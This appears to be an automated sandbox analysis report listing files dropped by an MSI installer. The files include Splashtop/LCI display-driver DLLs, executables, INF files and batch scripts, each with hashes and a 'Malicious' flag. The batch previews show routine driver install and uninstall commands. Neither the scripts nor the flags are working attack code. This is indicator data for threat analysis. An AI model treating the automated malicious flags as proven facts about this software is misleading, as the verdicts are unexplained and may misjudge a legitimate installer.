                                                                                                                                                                                                                                                                                                                                  SHA1:2FFCC9CC689C7C3DA18DF015C4BCC880F185C800
                                                                                                                                                                                                                                                                                                                                  SHA-256:B628E895BFC38227DB258DB91959C6D55367877669944DA022A89469101D8BCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:3EAAB54CD58350BADBE0F32B78BA7EA8EA50072AA159A3A36AD730116247D225C164CFCAFFE920C34D9287E55E68D933A92D4F7E7D3CEF9E8E3F185DAB629BC7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.886509604340361
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:reQH6MzhfmNHuhv9LIFJxGNIiTwnPXIXBY+CzASxvh1b7sAmIb/IeUmV:rezev9cGNIiTGOY9Dxvh1xUrm
                                                                                                                                                                                                                                                                                                                                  MD5:815848A1B7AA76DE38315A7C796165DE
                                                                                                                                                                                                                                                                                                                                  SHA1:131016320240F5760853BB0AE8ED34CE8865C4B5
                                                                                                                                                                                                                                                                                                                                  SHA-256:99FF169E6114BA53DDC6BFCDB08CF73CB1104E69EEDC2A13F39605A96CAA5367
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A9453528FC5335AFF02717EE7271EBE253CF986FE71B7CE4BE4B060BE7EF625EA33877F98B2DEA54432A2F7625314A5B3DCF57518209E818EC03589257E69F6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.221234341229966
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:VrY6t5UbhKRvV2ktXrTsIeZvEMtXrGrJKhrlXgpAY1u5lSuWJmiDUNLk32pNaf1E:5Y6qhKT2mvsIeZvEuarJKhpXo1moJmiI
                                                                                                                                                                                                                                                                                                                                  MD5:BECB66962164A387453E351769E665A4
                                                                                                                                                                                                                                                                                                                                  SHA1:D5651F9CE02E1D48E85A33DCAFB906F3DC575365
                                                                                                                                                                                                                                                                                                                                  SHA-256:294AE63315DCFCBA4F8BB30BC4098E6BF39281244BC215FE9EB8EA3B778CEC48
                                                                                                                                                                                                                                                                                                                                  SHA-512:03523212E1827635EB2573ABE2B1A3D66BA529990917B739AF6B2C6727223D2E99E4A353B21F2871FFBCA44D22623409EA1451CF0A0ADBED9C0E8DBB6E55C6CF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x86\my_setup.dll....REM..REM If OSBase/KairOS driver is previously installed, stop the installation...REM..sc query ddmgr..IF %ERRORLEVEL% EQU 0 (.. echo OSBase iDisplay driver detected! Try uninstall OSbase/KairOS iDisplay software... goto exit..)....REM..REM If older driver (lci_proxykmd) is previously installed, stop the installation...REM..sc query lci_proxykmd..IF %ERRORLEVEL% EQU 0 (.. echo Older display driver detected! Uninstall it first.. %DEVCMD% do_uninstall_lci_proxykmd .. timeout /t 1 /nobreak.. sc.exe delete lci_proxykmd....:wait_for_delete.. sc query lci_proxykmd.. if %ERRORLEVEL% EQU 0 (.. timeout /t 1 /nobreak.. goto wait_for_delete.. )..... timeout /t 1 /nobreak.... del %
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1414
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.220204645552163
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:VrY6t5UbhKdvV2ktXrTsIeZvEMtXrGrJKhrlXgpAY1u5lSuWJmiDUNLkQ2pNaf1E:5Y6qhK32mvsIeZvEuarJKhpXo1moJmiX
                                                                                                                                                                                                                                                                                                                                  MD5:B80450985E33B188398EF5475FE3A4BA
                                                                                                                                                                                                                                                                                                                                  SHA1:6699FE7C174A9A585E3559A16877B5555687F6F0
                                                                                                                                                                                                                                                                                                                                  SHA-256:760BC44295820C5AF7E2D5077CE05EED8E23B3EF344D5C6C48422818DDE78D41
                                                                                                                                                                                                                                                                                                                                  SHA-512:BA29A71114A86E10ACE80F5B039DB68F4FE3BFD5592ECC6511D9AA0235E75ACFA188909EE0453593EBEFDB33DB46D1272C98A44350ABB24810C52FDEE817853F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x64\my_setup.dll....REM..REM If OSBase/KairOS driver is previously installed, stop the installation...REM..sc query ddmgr..IF %ERRORLEVEL% EQU 0 (.. echo OSBase iDisplay driver detected! Try uninstall OSbase/KairOS iDisplay software... goto exit..)....REM..REM If older driver (lci_proxykmd) is previously installed, stop the installation...REM..sc query lci_proxykmd..IF %ERRORLEVEL% EQU 0 (.. echo Older display driver detected! Uninstall it first.. %DEVCMD% do_uninstall_lci_proxykmd .. timeout /t 1 /nobreak.. sc.exe delete lci_proxykmd....:wait_for_delete.. sc query lci_proxykmd.. if %ERRORLEVEL% EQU 0 (.. timeout /t 1 /nobreak.. goto wait_for_delete.. )..... timeout /t 1 /nobreak.... del %
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):805
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.339948574341861
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:V8pgfeV4BZAK/1AN6gizSnOf6DE6Z9wmhKRvVLymhMm0KuKDLGuKw61IfQHyoHHO:VSIBBY6t5UbhKRvV7e6LpIJHT5C
                                                                                                                                                                                                                                                                                                                                  MD5:704D1CC8E0B87710278CE3EFD1C17954
                                                                                                                                                                                                                                                                                                                                  SHA1:EDF2D7FED5D3D88A657732B37C72E4CDEE90D12D
                                                                                                                                                                                                                                                                                                                                  SHA-256:FAB1408C7DE4B76FA3AF7AD4C9F25DF2063C591CDFC46445999D31B4DB712208
                                                                                                                                                                                                                                                                                                                                  SHA-512:6061B9BB1A4D55FD916A44C8619356DC4ED40C284F91FC2114CD5974533F762F88B4E0C49A265E96AD1E122ACFBA947D02AA3B11E43115D247FA0868661BDC3B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....reg delete "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /v "VirtualDisplay" /f....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x86\my_setup.dll....echo removing LCI PROXY WDDM Device.......%DEVCMD% do_uninstall_lci_proxykmd..%DEVCMD% do_uninstall_lci_proxywddm....timeout /t 1 /nobreak..sc.exe delete lci_proxykmd..sc.exe delete lci_proxywddm....timeout /t 2 /nobreak..del %SystemRoot%\System32\lci_proxyumd.dll..del %SystemRoot%\System32\drivers\lci_proxykmd.sys..del %SystemRoot%\System32\drivers\lci_proxywddm.sys..del %SystemRoot%\System32\drivers\UMDF\lci_iddcx.dll....:exit..ENDLOCAL
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):817
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.35613829912293
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:V8pgMyeV4BZAK/1AN6gizSnOf6DE6Z9wmhKdWiVLymhMm0KuKDLGuKw61IfQHyoO:VS3sBBY6t5UbhKdvV7e6LpIJHT5C
                                                                                                                                                                                                                                                                                                                                  MD5:319DCF0B017DAFA51C33A7489D123F91
                                                                                                                                                                                                                                                                                                                                  SHA1:60F8E32A2E7E05F2384D8B66E51F8FF1DE70AC10
                                                                                                                                                                                                                                                                                                                                  SHA-256:44A271D1DD10FFC85815DF277E708BE462CC5AFABC43BD0D7A9505E35A70E488
                                                                                                                                                                                                                                                                                                                                  SHA-512:EE6403E7069C1185F6F34A02DA2DE1FEC2F859E89523B769CF9EFDCAA2CD9E5AFA501ADC38169A86D86DA1570C789116A29C2485F87201CFD2A770EC447A55C3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off..SETLOCAL..%~d0..cd %~dp0....reg delete "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /v "VirtualDisplay" /f....REM..REM detect the OS version..REM..for /f "tokens=4-7 delims=[.] " %%i in ('ver') do (if %%i==Version (set v=%%j) else (set v=%%i))..if %v% GEQ 10 (.. cd win10..) else (.. cd win7..)..set DEVCMD=rundll32 x64\my_setup.dll....echo removing LCI PROXY WDDM Device.......%DEVCMD% do_uninstall_lci_proxykmd..%DEVCMD% do_uninstall_lci_proxywddm....timeout /t 1 /nobreak..sc.exe delete lci_proxykmd..sc.exe delete lci_proxywddm....timeout /t 2 /nobreak..del %SystemRoot%\System32\lci_proxyumd.dll..del %SystemRoot%\System32\drivers\lci_proxykmd.sys..del %SystemRoot%\System32\drivers\lci_proxywddm.sys..del %SystemRoot%\System32\drivers\UMDF\lci_iddcx.dll....:exit..ENDLOCAL
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):85216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.323561566613011
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:34rhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkApiKB:K+KY04RMmSCYmBiF4O7WTgKB
                                                                                                                                                                                                                                                                                                                                  MD5:CD483270630CCABBD1902C6B21FBE9D3
                                                                                                                                                                                                                                                                                                                                  SHA1:B33C3139DD83F108591383449D4F9136189D8F97
                                                                                                                                                                                                                                                                                                                                  SHA-256:49D6B913A4095A3E7B14554C91942BD5CDDDF9DCFDB076B31921592AFF1BC135
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC92ED176DBB7CC27BE1FFF90F875B2582869465156BD70F363902524C716822FB9657AA944A6F02CB1E77271F3D24F8667F4A678F5BB5B5846AB18E455A731F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):89312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.29323585141242
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:UP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7WsK6:UePOYe4bu1epDh8RWsK6
                                                                                                                                                                                                                                                                                                                                  MD5:07361279885BC0B334DDF5754CDB12FE
                                                                                                                                                                                                                                                                                                                                  SHA1:63A7320CD6992E2509EB1D82D550B1AA5FEA6A47
                                                                                                                                                                                                                                                                                                                                  SHA-256:96411A783BAA574421659E73B11F111A0EEB3D9B105CA55E29FE6C0B820646F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D07F5DFFEAD4470CAA935F6CD250DF9CA77A2D28C0B84112D83CE9ED7AC7A01CB012773FB290612E4DE45776BB919C395533AD3AD5497A3469BFE5B43FB5D1E8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10957
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.22853921730831
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0gNqq6a1DUuvE7EwWZhYC/nnbXfH098uXqnajH/svHa:0gEy9Zh3/njXuXlTsPa
                                                                                                                                                                                                                                                                                                                                  MD5:62458E58313475C9A3642A392363E359
                                                                                                                                                                                                                                                                                                                                  SHA1:E63A3866F20E8C057933BA75D940E5FD2BF62BC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:85620D87874F27D1AAF1743C0CA47E210C51D9AFD0C9381FC0CD8ACCA3854562
                                                                                                                                                                                                                                                                                                                                  SHA-512:49FB8CA58AECF97A6AB6B97DE7D367ACCB7C5BE76FBCD324AF4CE75EFE96642E8C488F273C0363250F7A5BCEA7F7055242D28FD4B1F130B68A1A5D9A078E7FAD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4514
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7887986776100973
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:9G2XN/WAXHQ+C2C4kqWDZXpbdl5Vjnijla4UAiI6fOgTiYqG585wg3Jp:9L5EDNRniWI6fyw5I
                                                                                                                                                                                                                                                                                                                                  MD5:1CEC22CA85E1B5A8615774FCA59A420B
                                                                                                                                                                                                                                                                                                                                  SHA1:049A651751EF38321A1088AF6A47C4380F9293FC
                                                                                                                                                                                                                                                                                                                                  SHA-256:60A018F46D17B7640FC34587667CD852A16FA8E82F957A69522637F22E5FE5CF
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F24FE3914AEF080A0D109DF6CFAC548A880947FB85E7490F0D8FA174A606730B29DC8D2AE10525DBA4D1CA05AC9B190E4704629B86AC96867188DF4CA3168BB
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..;.....;.M.o.d.u.l.e. .N.a.m.e.:.....;. . . . .l.c.i._.i.d.d.c.x...i.n.f.....;.....;.A.b.s.t.r.a.c.t.:.....;. . . . .I.N.F. .f.i.l.e. .f.o.r. .i.n.s.t.a.l.l.i.n.g. .t.h.e. .L.C.I. .I.D.D.C.X. .D.r.i.v.e.r.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.L.C.I.%.....C.a.t.a.l.o.g.F.i.l.e.=.l.c.i._.i.d.d.c.x...c.a.t.....D.r.i.v.e.r.V.e.r.=.1.2./.0.4./.2.0.1.8.,.1...0...2.0.1.8...1.2.0.4.........[.D.e.s.t.i.n.a.t.i.o.n.D.i.r.s.].....D.e.f.a.u.l.t.D.e.s.t.D.i.r. .=. .1.2.....U.M.D.r.i.v.e.r.C.o.p.y.=.1.2.,.U.M.D.F. .;. .c.o.p.y. .t.o. .d.r.i.v.e.r.s.\.u.m.d.f.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...x.8.6.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...a.m.d.6.4.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):12585
Entropy (8bit):7.124479508046628
Encrypted:false
SSDEEP:192:M9yLPtUtkB7uIqhmbgE7EwWZhYCyZR/HsgKqnajVhY2c8evGd:gZO49Zh3e1MgKlxW2c8eed
MD5:8E16D54F986DBE98812FD5EC04D434E8
SHA1:8BF49FA8E12F801559CC2869365F0B184D7F93FE
SHA-256:7C772FB24326E90D6E9C60A08495F32F7D5DEF1C52037D78CBD0436AD70549CD
SHA-512:E1DA797044663AD6362641189FA78116CC4B8E611F9D33C89D6C562F981D5913920ACB12A4F7EF6C1871490563470E583910045378BDA5C7A13DB25F987E9029
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):2715
Entropy (8bit):5.41680725095282
Encrypted:false
SSDEEP:48:qnchtOKbzLbS10bzPbSvb/mwwophwwoJOxWqrz61/zA9cjiJIjgW5FH1519HS4Bc:Pkua1YuSnEhn/A7ic4d4y
MD5:0315A579F5AFE989154CB7C6A6376B05
SHA1:E352FF670358CF71E0194918DFE47981E9CCBB88
SHA-256:D10FA136D6AE9A15216202E4DD9F787B3A148213569E438DA3BF82B618D8001D
SHA-512:C7CE8278BC5EE8F8B4738EF8BB2C0A96398B40DC65EEA1C28688E772AE0F873624311146F4F4EC8971C91DF57983D2D8CDBEC1FE98EAA7F9D15A2C159D80E0AF
Malicious:false
Reputation:unknown
Preview:;..;..;Module Name:..;..; lci_proxywddm.inf..;..;Abstract:..; LuminonCore Display Proxy Driver..;..;..[Version]..Signature="$WINDOWS NT$"..Class=System..ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}..Provider=%LCI%..DriverVer=12/04/2018,1.0.2018.1204..CatalogFile=lci_proxywddm.cat....[DestinationDirs]..DefaultDestDir = 12..lci_proxywddm.CopyFiles = 12 ; drivers..lci_proxyumd.CopyFiles = 11 ; system32..lci_proxyumdwow.CopyFiles = 10, SysWow64 ; x64-specific....[SourceDisksNames.x86]..1=%DiskId1%, lci_proxywddm.sys,,\x86..1=%DiskId1%, lci_proxyumd.dll,,\x86....[SourceDisksNames.amd64]..1=%DiskId1%, lci_proxywddm.sys,,\x64..1=%DiskId1%, lci_proxyumd.dll,,\x64..1=%DiskId1%, lci_proxyumd32.dll,,\x64....[SourceDisksFiles.x86]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1....[SourceDisksFiles.amd64]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1..lci_proxyumd32.dll = 1......;*****************************************
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):53752
Entropy (8bit):6.555505359489877
Encrypted:false
SSDEEP:768:q4+LP4B5MAHFQq4OSGtGkVPKLIy0uwc0yeuUjsVbGVjp3haxZ3vOoKn:q4+LS5XYOSk1Kky0uww6s5mN3haxZI
MD5:01E8BC64139D6B74467330B11331858D
SHA1:B6421A1D92A791B4D4548AB84F7140F4FC4EB829
SHA-256:148359A84C637D05C20A58F5038D8B2C5390F99A5A229BE8ECCBB5F85E969438
SHA-512:4099E8038D65D95D3F00FD32EBA012F55AE16D0DA3828E5D689EF32E20352FDFCC278CD6F78536DC7F28FB97D07185E654FE6EEE610822EA8D9E9D5AF696DFF5
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):184016
Entropy (8bit):6.2322376663017
Encrypted:false
SSDEEP:3072:uSNRRE5JX6GkYj9i/hXJTqHDh3ibNrg4WhC8MFMbgGYgITUP4uvo4B:uS6Pb5KnT2dSNsC+gGx62v/
MD5:4DC11547A5FC28CA8F6965FA21573481
SHA1:D531B0D8D2F8D49D81A4C17FBAF3BC294845362C
SHA-256:E9DB5CD21C8D709A47FC0CFB2C6CA3BB76A3ED8218BED5DC37948B3F9C7BD99D
SHA-512:BD0F0A3BBC598480A9B678AA1B35728B2380BF57B195B0249936D0EAAA014F219031A563F486871099BF1C78CCC758F6B25B97CFC5296A73FC60B6CAFF9877F6
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):138960
Entropy (8bit):6.622950914796068
Encrypted:false
SSDEEP:3072:Pi+6wKkplcu1L3/xFxqFYOA555ZRlremv59jYqN:6+9cu1oF/AnqqN
MD5:67AE7B2C36C9C70086B9D41B4515B0A8
SHA1:BA735D6A338C8FDFA61C98F328B97BF3E8E48B8B
SHA-256:79876F242B79269FE0FE3516F2BDB0A1922C86D820CE1DD98500B385511DAC69
SHA-512:4D8320440F3472EE0E9BD489DA749A738370970DE07B0920B535642723C92DE848F4B3D7F898689C817145CE7B08F65128ABE91D816827AEB7E5E193D7027078
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):122576
Entropy (8bit):6.535740565012407
Encrypted:false
SSDEEP:3072:dfSVevFp3FKtVy8ka9N9UOUNFZWEw+1M4hyFi:BSYNpkUOUrgxeMlo
MD5:B9B0E9B4D93B18B99ECE31A819D71D00
SHA1:2BE1AD570F3CCB2E6F2E2B16D1E0002CA4EC8D9E
SHA-256:0F1C64C0FA08FE45BEAC15DC675D3B956525B8F198E92E0CCAC21D2A70CE42CF
SHA-512:465E389806F3B87A544AB8B0B7B49864FEEBA2EEEF4FB51628D40175573ED1BA00B26D6A2ABEBC74C31369194206ED31D32C68471DDDCF817FDD2D26E3DA7A53
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23528
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.370136009210867
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:6kV9C2/s2Abnkr+YcSIVO67k5hVAi59RKzOqUIUz8JN77hhM/l:vP0bE+YHIO67kLZVj83ha/l
                                                                                                                                                                                                                                                                                                                                  MD5:D53AD812F1146CDDEA6A89806CC2439A
                                                                                                                                                                                                                                                                                                                                  SHA1:5102973DF29B7E70AD8845D3B5FA36DBEF294D56
                                                                                                                                                                                                                                                                                                                                  SHA-256:009DFAD5DEA03EA0C0B963EEA9CDCDB78668C8B35C19E2B92311D8703F00D6D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:38C2BFF7125F5BFD51A5D4D49D3C68BBCF9065057686AF8CAF7C3025BAE27CDFF4928BFB37C26A6ABAA750C699B99619E874CDD5EEF79F0E4010BB9ACCE56085
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):48640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8164297445194135
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xbWmecDs6zvVt94VbJqvhkqskgSjySwigs2K5m6Vj83h57zZ3ao:xbM6JX0Jq5kNGUsn5maI3h57zZ
                                                                                                                                                                                                                                                                                                                                  MD5:6A0CCBFF305B23A4BAE471025EC28D52
                                                                                                                                                                                                                                                                                                                                  SHA1:02519EC7FCC88969621B6DC7F1294DA4EA6EA611
                                                                                                                                                                                                                                                                                                                                  SHA-256:6659E90D80A2FA0CF9F6CE40E511D8763664E78820F27081935AC1BFD4723A19
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D357E3E9B19E2C18D1D3A1E6916C542243D6FF24D783A526B9E1C1605C328CD079A77AEE38DFF19BEC66E584CFDB4DF910CF98DF668D1EB2E825E2D36F816F2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.623789818078503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:0i+6wKkplcu1L3/xFxqFYOA555ZRlremv59jY3v:7+9cu1oF/Anq3v
                                                                                                                                                                                                                                                                                                                                  MD5:4276EDDE541ED3F488FA26778BDBB0D9
                                                                                                                                                                                                                                                                                                                                  SHA1:16E06CA60A9F8BCA515D193DFD28B120446BC178
                                                                                                                                                                                                                                                                                                                                  SHA-256:617F731B8F55F1AC23E47FE3C7CFD1110F198A5A9EB207FC485F739808446808
                                                                                                                                                                                                                                                                                                                                  SHA-512:280D6C3A85B26B4EE57534D33F035063B1DD56BA3671B48700833E4A61BEF1805C86316888AA5D8645603CA655F4172311B20C98533058823734C276A3CEA66B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.623166316895491
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:3i+6wKkplcu1L3/xFxqFYOA555ZRlremv59jYWB:S+9cu1oF/AnqWB
                                                                                                                                                                                                                                                                                                                                  MD5:7CC448724952FA3B42A7B16DCBD4B50B
                                                                                                                                                                                                                                                                                                                                  SHA1:65CC211E57AE073EA89B188B66D3D473B403DEF5
                                                                                                                                                                                                                                                                                                                                  SHA-256:D90F351153CA9A51ECC24575B6A586A9A01AF24BD84F552F8305201260EE486A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1C8F6034B4BA71C5D4508263DEDB00098C583F7EA4F39AE281E680C8DDA3583A0FE7FD00DD601E652CA0D301D29800AD13FC102038D4A836F99D44E331D3B2FD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95464
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7987777090492445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
